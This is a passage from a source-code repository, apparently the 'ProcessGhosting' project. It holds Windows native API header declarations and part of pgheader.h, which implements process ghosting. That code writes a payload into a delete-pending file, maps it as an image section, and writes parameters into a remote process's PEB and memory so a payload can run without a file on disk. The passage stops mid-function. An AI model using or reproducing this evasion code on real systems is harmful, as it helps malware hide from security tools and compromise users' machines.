3710 | 
3711 | NTSYSAPI
3712 | NTSTATUS
3713 | NTAPI
3714 | NtQuerySection (
3715 |     IN HANDLE SectionHandle,
3716 |     IN SECTION_INFORMATION_CLASS SectionInformationClass,
3717 |     OUT PVOID SectionInformation,
3718 |     IN ULONG Length,
3719 |     OUT PULONG ResultLength OPTIONAL
3720 |     );
3721 | 
3722 | 
3723 | NTSYSAPI
3724 | NTSTATUS
3725 | NTAPI
3726 | ZwQuerySection (
3727 |     IN HANDLE SectionHandle,
3728 |     IN SECTION_INFORMATION_CLASS SectionInformationClass,
3729 |     OUT PVOID SectionInformation,
3730 |     IN ULONG Length,
3731 |     OUT PULONG ResultLength OPTIONAL
3732 |     );
3733 | 
3734 | 
3735 | //-----------------------------------------------------------------------------
3736 | // Synchronization
3737 | 
3738 | //
3739 | // Wait type
3740 | //
3741 | 
3742 | typedef enum _WAIT_TYPE {
3743 |     WaitAll,
3744 |     WaitAny
3745 |     } WAIT_TYPE;
3746 | 
3747 | 
3748 | NTSYSAPI
3749 | NTSTATUS
3750 | NTAPI
3751 | NtWaitForSingleObject (
3752 |     IN HANDLE Handle,
3753 |     IN BOOLEAN Alertable,
3754 |     IN PLARGE_INTEGER Timeout OPTIONAL
3755 |     );
3756 | 
3757 | 
3758 | NTSYSAPI
3759 | NTSTATUS
3760 | NTAPI
3761 | ZwWaitForSingleObject (
3762 |     IN HANDLE Handle,
3763 |     IN BOOLEAN Alertable,
3764 |     IN PLARGE_INTEGER Timeout OPTIONAL
3765 |     );
3766 | 
3767 | 
3768 | NTSYSAPI
3769 | NTSTATUS
3770 | NTAPI
3771 | NtWaitForMultipleObjects (
3772 |     IN ULONG Count,
3773 |     IN HANDLE Handle[],
3774 |     IN WAIT_TYPE WaitType,
3775 |     IN BOOLEAN Alertable,
3776 |     IN PLARGE_INTEGER Timeout OPTIONAL
3777 |     );
3778 | 
3779 | 
3780 | NTSYSAPI
3781 | NTSTATUS
3782 | NTAPI
3783 | ZwWaitForMultipleObjects (
3784 |     IN ULONG Count,
3785 |     IN HANDLE Handle[],
3786 |     IN WAIT_TYPE WaitType,
3787 |     IN BOOLEAN Alertable,
3788 |     IN PLARGE_INTEGER Timeout OPTIONAL
3789 |     );
3790 | 
3791 | 
3792 | //-----------------------------------------------------------------------------
3793 | // Event support
3794 | 
3795 | typedef enum _EVENT_INFORMATION_CLASS {
3796 |     EventBasicInformation    // = 0
3797 | } EVENT_INFORMATION_CLASS;
3798 | 
3799 | typedef struct _EVENT_BASIC_INFORMATION {
3800 |     EVENT_TYPE EventType;
3801 |     LONG EventState;
3802 | } EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;
3803 | 
3804 | //
3805 | // Event handling routines
3806 | //
3807 | 
3808 | 
3809 | NTSYSAPI
3810 | NTSTATUS
3811 | NTAPI
3812 | NtCreateEvent (
3813 |     OUT PHANDLE EventHandle,
3814 |     IN ACCESS_MASK DesiredAccess,
3815 |     IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
3816 |     IN EVENT_TYPE EventType,
3817 |     IN BOOLEAN InitialState
3818 |     );
3819 | 
3820 | 
3821 | NTSYSAPI
3822 | NTSTATUS
3823 | NTAPI
3824 | ZwCreateEvent (
3825 |     OUT PHANDLE EventHandle,
3826 |     IN ACCESS_MASK DesiredAccess,
3827 |     IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
3828 |     IN EVENT_TYPE EventType,
3829 |     IN BOOLEAN InitialState
3830 |     );
3831 | 
3832 | 
3833 | NTSYSAPI
3834 | NTSTATUS
3835 | NTAPI
3836 | NtClearEvent (
3837 |     IN HANDLE Handle
3838 |     );
3839 | 
3840 | 
3841 | NTSYSAPI
3842 | NTSTATUS
3843 | NTAPI
3844 | ZwClearEvent (
3845 |     IN HANDLE Handle
3846 |     );
3847 | 
3848 | 
3849 | NTSYSAPI
3850 | NTSTATUS
3851 | NTAPI
3852 | NtPulseEvent (
3853 |     IN HANDLE Handle,
3854 |     OUT PLONG PreviousState OPTIONAL
3855 |     );
3856 | 
3857 | 
3858 | NTSYSAPI
3859 | NTSTATUS
3860 | NTAPI
3861 | ZwPulseEvent (
3862 |     IN HANDLE Handle,
3863 |     OUT PLONG PreviousState OPTIONAL
3864 |     );
3865 | 
3866 | 
3867 | NTSYSAPI
3868 | NTSTATUS
3869 | NTAPI
3870 | NtResetEvent (
3871 |     IN HANDLE Handle,
3872 |     OUT PLONG PreviousState OPTIONAL
3873 |     );
3874 | 
3875 | 
3876 | NTSYSAPI
3877 | NTSTATUS
3878 | NTAPI
3879 | ZwResetEvent (
3880 |     IN HANDLE Handle,
3881 |     OUT PLONG PreviousState OPTIONAL
3882 |     );
3883 | 
3884 | 
3885 | NTSYSAPI
3886 | NTSTATUS
3887 | NTAPI
3888 | NtSetEvent (
3889 |     IN HANDLE Handle,
3890 |     OUT PLONG PreviousState OPTIONAL
3891 |     );
3892 | 
3893 | 
3894 | NTSYSAPI
3895 | NTSTATUS
3896 | NTAPI
3897 | ZwSetEvent (
3898 |     IN HANDLE Handle,
3899 |     OUT PLONG PreviousState OPTIONAL
3900 |     );
3901 | 
3902 | 
3903 | NTSYSAPI
3904 | NTSTATUS
3905 | NTAPI
3906 | NtOpenEvent (
3907 |     OUT PHANDLE EventHandle,
3908 |     IN ACCESS_MASK DesiredAccess,
3909 |     IN POBJECT_ATTRIBUTES ObjectAttributes
3910 |     );
3911 | 
3912 | 
3913 | NTSYSAPI
3914 | NTSTATUS
3915 | NTAPI
3916 | ZwOpenEvent (
3917 |     OUT PHANDLE EventHandle,
3918 |     IN ACCESS_MASK DesiredAccess,
3919 |     IN POBJECT_ATTRIBUTES ObjectAttributes
3920 |     );
3921 | 
3922 | 
3923 | NTSYSAPI
3924 | NTSTATUS
3925 | NTAPI
3926 | NtQueryEvent (
3927 |     IN HANDLE EventHandle,
3928 |     IN EVENT_INFORMATION_CLASS EventInfoClass,
3929 |     OUT PVOID EventInfo,
3930 |     IN ULONG Length,
3931 |     OUT PULONG ResultLength OPTIONAL
3932 |     );
3933 | 
3934 | 
3935 | NTSYSAPI
3936 | NTSTATUS
3937 | NTAPI
3938 | ZwQueryEvent (
3939 |     IN HANDLE EventHandle,
3940 |     IN EVENT_INFORMATION_CLASS EventInfoClass,
3941 |     OUT PVOID EventInfo,
3942 |     IN ULONG Length,
3943 |     OUT PULONG ResultLength OPTIONAL
3944 |     );
3945 | 
3946 | 
3947 | //-----------------------------------------------------------------------------
3948 | // Security descriptor functions
3949 | 
3950 | NTSYSAPI
3951 | NTSTATUS
3952 | NTAPI
3953 | RtlCreateSecurityDescriptor (
3954 |     IN PSECURITY_DESCRIPTOR SecurityDescriptor,
3955 |     IN ULONG Revision
3956 |     );
3957 | 
3958 | 
3959 | NTSYSAPI
3960 | NTSTATUS
3961 | NTAPI
3962 | RtlSetDaclSecurityDescriptor(
3963 |     IN PSECURITY_DESCRIPTOR SecurityDescriptor,
3964 |     IN BOOLEAN DaclPresent,
3965 |     IN PACL Dacl OPTIONAL,
3966 |     IN BOOLEAN DaclDefaulted OPTIONAL
3967 |     );
3968 | 
3969 | 
3970 | NTSYSAPI
3971 | NTSTATUS
3972 | NTAPI
3973 | RtlSetOwnerSecurityDescriptor (
3974 |     IN PSECURITY_DESCRIPTOR SecurityDescriptor,
3975 |     IN PSID Owner OPTIONAL,
3976 |     IN BOOLEAN OwnerDefaulted OPTIONAL
3977 |     );
3978 | 
3979 | 
3980 | NTSYSAPI
3981 | NTSTATUS
3982 | NTAPI
3983 | RtlAllocateAndInitializeSid(
3984 |     IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,
3985 |     IN UCHAR SubAuthorityCount,
3986 |     IN ULONG SubAuthority0,
3987 |     IN ULONG SubAuthority1,
3988 |     IN ULONG SubAuthority2,
3989 |     IN ULONG SubAuthority3,
3990 |     IN ULONG SubAuthority4,
3991 |     IN ULONG SubAuthority5,
3992 |     IN ULONG SubAuthority6,
3993 |     IN ULONG SubAuthority7,
3994 |     OUT PSID *Sid
3995 |     );
3996 | 
3997 | 
3998 | NTSYSAPI
3999 | ULONG
4000 | NTAPI
4001 | RtlLengthSid (
4002 |     IN PSID Sid
4003 |     );
4004 | 
4005 | 
4006 | NTSYSAPI
4007 | BOOLEAN
4008 | NTAPI
4009 | RtlEqualSid (
4010 |     IN PSID Sid1,
4011 |     IN PSID Sid2
4012 |     );
4013 | 
4014 | 
4015 | NTSYSAPI
4016 | PVOID
4017 | NTAPI
4018 | RtlFreeSid(
4019 |     IN PSID Sid
4020 |     );
4021 | 
4022 | 
4023 | NTSYSAPI
4024 | NTSTATUS
4025 | NTAPI
4026 | RtlCreateAcl(
4027 |     IN PACL Acl,
4028 |     IN ULONG AclLength,
4029 |     IN ULONG AclRevision
4030 |     );
4031 | 
4032 | 
4033 | NTSYSAPI
4034 | NTSTATUS
4035 | NTAPI
4036 | RtlAddAccessAllowedAce(
4037 |     IN OUT PACL Acl,
4038 |     IN ULONG AceRevision,
4039 |     IN ACCESS_MASK AccessMask,
4040 |     IN PSID Sid
4041 |     );
4042 | 
4043 | 
4044 | NTSYSAPI
4045 | NTSTATUS
4046 | NTAPI
4047 | RtlAddAccessAllowedAceEx(
4048 |     IN OUT PACL Acl,
4049 |     IN ULONG AceRevision,
4050 |     IN ULONG AceFlags,
4051 |     IN ULONG AccessMask,
4052 |     IN PSID Sid
4053 |     );
4054 | 
4055 | //-----------------------------------------------------------------------------
4056 | // Token functions
4057 | 
4058 | NTSYSAPI
4059 | NTSTATUS
4060 | NTAPI
4061 | NtOpenProcessToken(
4062 |     IN HANDLE ProcessHandle,
4063 |     IN ACCESS_MASK DesiredAccess,
4064 |     OUT PHANDLE TokenHandle
4065 |     );
4066 | 
4067 | 
4068 | NTSYSAPI
4069 | NTSTATUS
4070 | NTAPI
4071 | NtOpenThreadToken(
4072 |     IN HANDLE ThreadHandle,
4073 |     IN ACCESS_MASK DesiredAccess,
4074 |     IN BOOLEAN OpenAsSelf,
4075 |     OUT PHANDLE TokenHandle
4076 |     );
4077 | 
4078 | 
4079 | NTSYSAPI
4080 | NTSTATUS
4081 | NTAPI
4082 | NtQueryInformationToken(
4083 |     IN HANDLE  TokenHandle,
4084 |     IN TOKEN_INFORMATION_CLASS  TokenInformationClass,
4085 |     OUT PVOID  TokenInformation,
4086 |     IN ULONG  TokenInformationLength,
4087 |     OUT PULONG  ReturnLength
4088 |     );
4089 | 
4090 | 
4091 | NTSYSAPI
4092 | NTSTATUS
4093 | NTAPI
4094 | NtSetInformationToken(
4095 |     IN HANDLE  TokenHandle,
4096 |     IN TOKEN_INFORMATION_CLASS  TokenInformationClass,
4097 |     IN PVOID  TokenInformation,
4098 |     IN ULONG  TokenInformationLength
4099 |     );
4100 | 
4101 | 
4102 | NTSYSAPI
4103 | NTSTATUS
4104 | NTAPI
4105 | NtAdjustPrivilegesToken(
4106 |     IN HANDLE TokenHandle,
4107 |     IN BOOLEAN DisableAllPrivileges,
4108 |     IN PTOKEN_PRIVILEGES NewState OPTIONAL,
4109 |     IN ULONG BufferLength OPTIONAL,
4110 |     IN PTOKEN_PRIVILEGES PreviousState OPTIONAL,
4111 |     OUT PULONG ReturnLength
4112 |     );
4113 | 
4114 | 
4115 | NTSYSAPI
4116 | NTSTATUS
4117 | NTAPI
4118 | NtDuplicateToken(
4119 |     IN HANDLE ExistingTokenHandle,
4120 |     IN ACCESS_MASK DesiredAccess,
4121 |     IN POBJECT_ATTRIBUTES ObjectAttributes,
4122 |     IN BOOLEAN EffectiveOnly,
4123 |     IN TOKEN_TYPE TokenType,
4124 |     OUT PHANDLE NewTokenHandle
4125 |     );
4126 | 
4127 | 
4128 | NTSYSAPI
4129 | NTSTATUS
4130 | NTAPI
4131 | NtCompareTokens(
4132 |     IN  HANDLE FirstTokenHandle,
4133 |     IN  HANDLE SecondTokenHandle,
4134 |     OUT PBOOLEAN IdenticalTokens
4135 |     );
4136 | 
4137 | 
4138 | //-----------------------------------------------------------------------------
4139 | // Symbolic links
4140 | 
4141 | //
4142 | // Object Manager Symbolic Link Specific Access Rights.
4143 | //
4144 | 
4145 | #ifndef SYMBOLIC_LINK_QUERY
4146 | #define SYMBOLIC_LINK_QUERY (0x0001)
4147 | #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
4148 | #endif
4149 | 
4150 | NTSYSAPI
4151 | NTSTATUS
4152 | NTAPI
4153 | NtOpenSymbolicLinkObject (
4154 |     OUT PHANDLE SymbolicLinkHandle,
4155 |     IN ACCESS_MASK DesiredAccess,
4156 |     IN POBJECT_ATTRIBUTES ObjectAttributes
4157 |     );
4158 | 
4159 | 
4160 | NTSYSAPI
4161 | NTSTATUS
4162 | NTAPI
4163 | NtQuerySymbolicLinkObject (
4164 |     IN HANDLE SymbolicLinkHandle,
4165 |     OUT PUNICODE_STRING NameString,
4166 |     OUT PULONG ResultLength OPTIONAL
4167 |     );
4168 | 
4169 | //-----------------------------------------------------------------------------
4170 | // Loader functions
4171 | 
4172 | NTSYSAPI
4173 | NTSTATUS
4174 | NTAPI
4175 | LdrGetDllHandle(
4176 |     IN PWSTR DllPath OPTIONAL,
4177 |     IN PULONG DllCharacteristics OPTIONAL,
4178 |     IN PUNICODE_STRING DllName,
4179 |     OUT PVOID * DllHandle
4180 |     );
4181 | 
4182 | 
4183 | NTSYSAPI
4184 | NTSTATUS
4185 | NTAPI
4186 | LdrGetProcedureAddress(
4187 |     IN PVOID DllHandle,
4188 |     IN PANSI_STRING ProcedureName OPTIONAL,
4189 |     IN ULONG ProcedureNumber OPTIONAL,
4190 |     OUT PVOID *ProcedureAddress
4191 |     );
4192 | 
4193 | 
4194 | NTSYSAPI
4195 | NTSTATUS
4196 | NTAPI
4197 | LdrLoadDll(
4198 |     IN PWSTR DllPath OPTIONAL,
4199 |     IN PULONG DllCharacteristics OPTIONAL,
4200 |     IN PUNICODE_STRING DllName,
4201 |     OUT PVOID *DllHandle
4202 |     );
4203 | 
4204 | NTSYSAPI
4205 | NTSTATUS
4206 | NTAPI
4207 | LdrFindEntryForAddress(
4208 | 	IN PVOID Address,
4209 | 	OUT PLDR_DATA_TABLE_ENTRY *Module
4210 | 	);
4211 | 
4212 | NTSYSAPI
4213 | VOID
4214 | NTAPI
4215 | 	RtlGetCallersAddress(
4216 | 	OUT PVOID  *CallersAddress,
4217 | 	OUT PVOID  *CallersCaller
4218 | 	);
4219 | 
4220 | //-----------------------------------------------------------------------------
4221 | // Functions dealing with NTSTATUS and Win32 error
4222 | 
4223 | NTSYSAPI
4224 | ULONG
4225 | NTAPI
4226 | RtlNtStatusToDosError(
4227 |     NTSTATUS Status
4228 |     );
4229 | 
4230 | 
4231 | NTSYSAPI
4232 | ULONG
4233 | NTAPI
4234 | RtlNtStatusToDosErrorNoTeb(
4235 |     NTSTATUS Status
4236 |     );
4237 | 
4238 | 
4239 | NTSYSAPI
4240 | NTSTATUS
4241 | NTAPI
4242 | RtlGetLastNtStatus(
4243 |     );
4244 | 
4245 | 
4246 | NTSYSAPI
4247 | ULONG
4248 | NTAPI
4249 | RtlGetLastWin32Error(
4250 |     );
4251 | 
4252 | 
4253 | NTSYSAPI
4254 | VOID
4255 | NTAPI
4256 | RtlSetLastWin32Error(
4257 |     ULONG WinError
4258 |     );
4259 | 
4260 | 
4261 | NTSYSAPI
4262 | VOID
4263 | NTAPI
4264 | RtlSetLastWin32ErrorAndNtStatusFromNtStatus(
4265 |     NTSTATUS Status
4266 |     );
4267 | 
4268 | 
4269 | //-----------------------------------------------------------------------------
4270 | // I/O functions
4271 | 
4272 | 
4273 | NTSYSAPI
4274 | NTSTATUS
4275 | NTAPI
4276 | NtDisplayString(
4277 |     IN PUNICODE_STRING String
4278 |     );
4279 | 
4280 | 
4281 | #ifdef __cplusplus
4282 | } // extern "C"
4283 | #endif
4284 | 
4285 | #endif // __NTDLL_H__
4286 | 


--------------------------------------------------------------------------------
/ProcessGhost/ntdll_types.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | /*
 3 | based on: pstype.h by Alex Ionescu
 4 | */
 5 | //
 6 | // Flags for NtCreateProcessEx
 7 | //
 8 | #define PROCESS_CREATE_FLAGS_BREAKAWAY          0x00000001
 9 | #define PROCESS_CREATE_FLAGS_NO_DEBUG_INHERIT   0x00000002
10 | #define PROCESS_CREATE_FLAGS_INHERIT_HANDLES    0x00000004
11 | #define PROCESS_CREATE_FLAGS_OVERRIDE_ADDRESS_SPACE 0x00000008
12 | #define PROCESS_CREATE_FLAGS_LARGE_PAGES        0x00000010
13 | 
14 | //
15 | // Process priority classes
16 | //
17 | #define PROCESS_PRIORITY_CLASS_INVALID          0
18 | #define PROCESS_PRIORITY_CLASS_IDLE             1
19 | #define PROCESS_PRIORITY_CLASS_NORMAL           2
20 | #define PROCESS_PRIORITY_CLASS_HIGH             3
21 | #define PROCESS_PRIORITY_CLASS_REALTIME         4
22 | #define PROCESS_PRIORITY_CLASS_BELOW_NORMAL     5
23 | #define PROCESS_PRIORITY_CLASS_ABOVE_NORMAL     6
24 | 
25 | //
26 | // NtCreateProcessEx flags
27 | //
28 | #define PS_REQUEST_BREAKAWAY                    1
29 | #define PS_NO_DEBUG_INHERIT                     2
30 | #define PS_INHERIT_HANDLES                      4
31 | #define PS_LARGE_PAGES                          8
32 | #define PS_ALL_FLAGS                            (PS_REQUEST_BREAKAWAY | \
33 |                                                  PS_NO_DEBUG_INHERIT  | \
34 |                                                  PS_INHERIT_HANDLES   | \
35 |                                                  PS_LARGE_PAGES)
36 | 
37 | //
38 | // Process base priorities
39 | //
40 | #define PROCESS_PRIORITY_IDLE                   3
41 | #define PROCESS_PRIORITY_NORMAL                 8
42 | #define PROCESS_PRIORITY_NORMAL_FOREGROUND      9
43 | 
44 | //
45 | // Process memory priorities
46 | //
47 | #define MEMORY_PRIORITY_BACKGROUND             0
48 | #define MEMORY_PRIORITY_UNKNOWN                1
49 | #define MEMORY_PRIORITY_FOREGROUND             2
50 | 
51 | /*
52 | based on ProcessHacker source:
53 | */
54 | 
55 | #define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
56 | #define RTL_USER_PROC_PROFILE_USER 0x00000002
57 | #define RTL_USER_PROC_PROFILE_KERNEL 0x00000004
58 | #define RTL_USER_PROC_PROFILE_SERVER 0x00000008
59 | #define RTL_USER_PROC_RESERVE_1MB 0x00000020
60 | #define RTL_USER_PROC_RESERVE_16MB 0x00000040
61 | #define RTL_USER_PROC_CASE_SENSITIVE 0x00000080
62 | #define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100
63 | #define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000
64 | #define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000
65 | #define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000
66 | #define RTL_USER_PROC_OPTIN_PROCESS 0x00020000
67 | 


--------------------------------------------------------------------------------
/ProcessGhost/ntdll_undoc.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knightswd/ProcessGhosting/2709d1c536c8b4202e1404a9f1fc1f6d4741f9d3/ProcessGhost/ntdll_undoc.cpp


--------------------------------------------------------------------------------
/ProcessGhost/ntdll_undoc.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <Windows.h>
 4 | #include "ntddk.h"
 5 | #include "ntdll_types.h"
 6 | 
 7 | //Functions:
 8 | 
 9 | 
10 | extern NTSTATUS (NTAPI *RtlCreateProcessParametersEx)(
11 |     _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
12 |     _In_ PUNICODE_STRING ImagePathName,
13 |     _In_opt_ PUNICODE_STRING DllPath,
14 |     _In_opt_ PUNICODE_STRING CurrentDirectory,
15 |     _In_opt_ PUNICODE_STRING CommandLine,
16 |     _In_opt_ PVOID Environment,
17 |     _In_opt_ PUNICODE_STRING WindowTitle,
18 |     _In_opt_ PUNICODE_STRING DesktopInfo,
19 |     _In_opt_ PUNICODE_STRING ShellInfo,
20 |     _In_opt_ PUNICODE_STRING RuntimeData,
21 |     _In_ ULONG Flags // pass RTL_USER_PROC_PARAMS_NORMALIZED to keep parameters normalized
22 | );
23 | 
24 | 
25 | 
26 | // Initialization function:
27 | 
28 | bool init_ntdll_func();
29 | 


--------------------------------------------------------------------------------
/ProcessGhost/pgheader.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | #include "PG.h"
  3 | 
  4 | 
  5 | HANDLE open_file(wchar_t* filePath)
  6 | {
  7 | 
  8 | 	wstring nt_path = L"\\??\\" + wstring(filePath);
  9 | 
 10 | 	UNICODE_STRING file_name = { 0 };
 11 | 	RtlInitUnicodeString(&file_name, nt_path.c_str());
 12 | 
 13 | 	OBJECT_ATTRIBUTES attr = { 0 };
 14 | 	InitializeObjectAttributes(&attr, &file_name, OBJ_CASE_INSENSITIVE, NULL, NULL);
 15 | 
 16 | 	IO_STATUS_BLOCK status_block = { 0 };
 17 | 	HANDLE file = INVALID_HANDLE_VALUE;
 18 | 	NTSTATUS stat = NtOpenFile(&file,
 19 | 		DELETE | SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE,
 20 | 		&attr,
 21 | 		&status_block,
 22 | 		FILE_SHARE_READ | FILE_SHARE_WRITE,
 23 | 		FILE_SUPERSEDE | FILE_SYNCHRONOUS_IO_NONALERT
 24 | 	);
 25 | 	if (!NT_SUCCESS(stat)) {
 26 | 		std::cout << "Failed to open, status: " << std::hex << stat << std::endl;
 27 | 		return INVALID_HANDLE_VALUE;
 28 | 	}
 29 | 	std::wcout << "[+] Created temp file: " << filePath << "\n";
 30 | 	return file;
 31 | }
 32 | HANDLE make_section_from_delete_pending_file(wchar_t* filePath, BYTE* payladBuf, DWORD payloadSize) {
 33 | 	HANDLE hDelFile = open_file(filePath);
 34 | 	NTSTATUS status = 0;
 35 | 	IO_STATUS_BLOCK status_block = { 0 };
 36 | 
 37 | 	FILE_DISPOSITION_INFORMATION info = { 0 };
 38 | 	info.DeleteFile = TRUE;
 39 | 	status = NtSetInformationFile(hDelFile, &status_block, &info, sizeof(info), FileDispositionInformation);
 40 | 	if (!NT_SUCCESS(status)) {
 41 | 		cout << "Setting information failed: " << hex << status << "\n";
 42 | 		return INVALID_HANDLE_VALUE;
 43 | 	}
 44 | 	LARGE_INTEGER ByteOffset = { 0 };
 45 | 
 46 | 	status = NtWriteFile(
 47 | 		hDelFile,
 48 | 		NULL,
 49 | 		NULL,
 50 | 		NULL,
 51 | 		&status_block,
 52 | 		payladBuf,
 53 | 		payloadSize,
 54 | 		&ByteOffset,
 55 | 		NULL
 56 | 	);
 57 | 	if (!NT_SUCCESS(status)) {
 58 | 		DWORD err = GetLastError();
 59 | 		cout << "Failed writing payload! Error: " << hex << err << endl;
 60 | 		return INVALID_HANDLE_VALUE;
 61 | 	}
 62 | 	HANDLE hSection = nullptr;
 63 | 	status = NtCreateSection(&hSection,
 64 | 		SECTION_ALL_ACCESS,
 65 | 		NULL,
 66 | 		0,
 67 | 		PAGE_READONLY,
 68 | 		SEC_IMAGE,
 69 | 		hDelFile
 70 | 	);
 71 | 	if (status != STATUS_SUCCESS) {
 72 | 		cerr << "NtCreateSection failed: " << hex << status << endl;
 73 | 		return INVALID_HANDLE_VALUE;
 74 | 	}
 75 | 	NtClose(hDelFile);
 76 | 	hDelFile = nullptr;
 77 | 
 78 | 	return hSection;
 79 | }
 80 | 
 81 | bool buffer_remote_peb(HANDLE hProcess, PROCESS_BASIC_INFORMATION& pi, OUT PEB& peb_copy)
 82 | {
 83 | 	memset(&peb_copy, 0, sizeof(PEB));
 84 | 	PPEB remote_peb_addr = pi.PebBaseAddress;
 85 | #ifdef _DEBUG
 86 | 	std::cout << "PEB address: " << (std::hex) << (ULONGLONG)remote_peb_addr << std::endl;
 87 | #endif 
 88 | 	// Write the payload's ImageBase into remote process' PEB:
 89 | 	NTSTATUS status = NtReadVirtualMemory(hProcess, remote_peb_addr, &peb_copy, sizeof(PEB), NULL);
 90 | 	if (status != STATUS_SUCCESS)
 91 | 	{
 92 | 		std::cerr << "Cannot read remote PEB: " << GetLastError() << std::endl;
 93 | 		return false;
 94 | 	}
 95 | 	return true;
 96 | }
 97 | 
 98 | BYTE* get_nt_hrds(const BYTE* pe_buffer)
 99 | {
100 | 	if (pe_buffer == NULL) return NULL;
101 | 
102 | 	IMAGE_DOS_HEADER* idh = (IMAGE_DOS_HEADER*)pe_buffer;
103 | 	if (idh->e_magic != IMAGE_DOS_SIGNATURE) {
104 | 		return NULL;
105 | 	}
106 | 	const LONG kMaxOffset = 1024;
107 | 	LONG pe_offset = idh->e_lfanew;
108 | 
109 | 	if (pe_offset > kMaxOffset) return NULL;
110 | 
111 | 	IMAGE_NT_HEADERS32* inh = (IMAGE_NT_HEADERS32*)(pe_buffer + pe_offset);
112 | 	if (inh->Signature != IMAGE_NT_SIGNATURE) {
113 | 		return NULL;
114 | 	}
115 | 	return (BYTE*)inh;
116 | }
117 | 
118 | DWORD get_entry_point_rva(const BYTE* pe_buffer)
119 | {
120 | 	BYTE* payload_nt_hdr = get_nt_hrds(pe_buffer);
121 | 	if (payload_nt_hdr == NULL) {
122 | 		return 0;
123 | 	}
124 | 	DWORD ep_addr = 0;
125 | 
126 | 	IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr;
127 | 	ep_addr = payload_nt_hdr64->OptionalHeader.AddressOfEntryPoint;
128 | 
129 | 	return ep_addr;
130 | }
131 | 
132 | wchar_t* get_file_name(wchar_t* full_path)
133 | {
134 | 	size_t len = wcslen(full_path);
135 | 	for (size_t i = len - 2; i >= 0; i--) {
136 | 		if (full_path[i] == '\\' || full_path[i] == '/') {
137 | 			return full_path + (i + 1);
138 | 		}
139 | 	}
140 | 	return full_path;
141 | }
142 | 
143 | wchar_t* get_directory(IN wchar_t* full_path, OUT wchar_t* out_buf, IN const size_t out_buf_size)
144 | {
145 | 	memset(out_buf, 0, out_buf_size);
146 | 	memcpy(out_buf, full_path, out_buf_size);
147 | 
148 | 	wchar_t* name_ptr = get_file_name(out_buf);
149 | 	if (name_ptr != nullptr) {
150 | 		*name_ptr = '\0'; //cut it
151 | 	}
152 | 	return out_buf;
153 | }
154 | 
155 | LPVOID write_params_into_process(HANDLE hProcess, PRTL_USER_PROCESS_PARAMETERS params, DWORD protect)
156 | {
157 | 	if (params == NULL) return NULL;
158 | 
159 | 	PVOID buffer = params;
160 | 	ULONG_PTR buffer_end = (ULONG_PTR)params + params->Length;
161 | 
162 | 	//params and environment in one space:
163 | 	if (params->Environment) {
164 | 		if ((ULONG_PTR)params > (ULONG_PTR)params->Environment) {
165 | 			buffer = (PVOID)params->Environment;
166 | 		}
167 | 		ULONG_PTR env_end = (ULONG_PTR)params->Environment + params->EnvironmentSize;
168 | 		if (env_end > buffer_end) {
169 | 			buffer_end = env_end;
170 | 		}
171 | 	}
172 | 	// copy the continuous area containing parameters + environment
173 | 	SIZE_T buffer_size = buffer_end - (ULONG_PTR)buffer;
174 | 	if (VirtualAllocEx(hProcess, buffer, buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)) {
175 | 		if (!WriteProcessMemory(hProcess, (LPVOID)params, (LPVOID)params, params->Length, NULL)) {
176 | 			std::cerr << "Writing RemoteProcessParams failed" << std::endl;
177 | 			return nullptr;
178 | 		}
179 | 		if (params->Environment) {
180 | 			if (!WriteProcessMemory(hProcess, (LPVOID)params->Environment, (LPVOID)params->Environment, params->EnvironmentSize, NULL)) {
181 | 				std::cerr << "Writing environment failed" << std::endl;
182 | 				return nullptr;
183 | 			}
184 | 		}
185 | 		return (LPVOID)params;
186 | 	}
187 | 
188 | 	// could not copy the continuous space, try to fill it as separate chunks:
189 | 	if (!VirtualAllocEx(hProcess, (LPVOID)params, params->Length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)) {
190 | 		std::cerr << "Allocating RemoteProcessParams failed" << std::endl;
191 | 		return nullptr;
192 | 	}
193 | 	if (!WriteProcessMemory(hProcess, (LPVOID)params, (LPVOID)params, params->Length, NULL)) {
194 | 		std::cerr << "Writing RemoteProcessParams failed" << std::endl;
195 | 		return nullptr;
196 | 	}
197 | 	if (params->Environment) {
198 | 		if (!VirtualAllocEx(hProcess, (LPVOID)params->Environment, params->EnvironmentSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)) {
199 | 			std::cerr << "Allocating environment failed" << std::endl;
200 | 			return nullptr;
201 | 		}
202 | 		if (!WriteProcessMemory(hProcess, (LPVOID)params->Environment, (LPVOID)params->Environment, params->EnvironmentSize, NULL)) {
203 | 			std::cerr << "Writing environment failed" << std::endl;
204 | 			return nullptr;
205 | 		}
206 | 	}
207 | 	return (LPVOID)params;
208 | }
209 | 
210 | bool set_params_in_peb(PVOID params_base, HANDLE hProcess, PROCESS_BASIC_INFORMATION& pbi)
211 | {
212 | 	// Get access to the remote PEB:
213 | 	ULONGLONG remote_peb_addr = (ULONGLONG)pbi.PebBaseAddress;
214 | 	if (!remote_peb_addr) {
215 | 		std::cerr << "Failed getting remote PEB address!" << std::endl;
216 | 		return false;
217 | 	}
218 | 	PEB peb_copy = { 0 };
219 | 	ULONGLONG offset = (ULONGLONG)&peb_copy.ProcessParameters - (ULONGLONG)&peb_copy;
220 | 
221 | 	// Calculate offset of the parameters
222 | 	LPVOID remote_img_base = (LPVOID)(remote_peb_addr + offset);
223 | 
224 | 	//Write parameters address into PEB:
225 | 	SIZE_T written = 0;
226 | 	if (!WriteProcessMemory(hProcess, remote_img_base,
227 | 		&params_base, sizeof(PVOID),
228 | 		&written))
229 | 	{
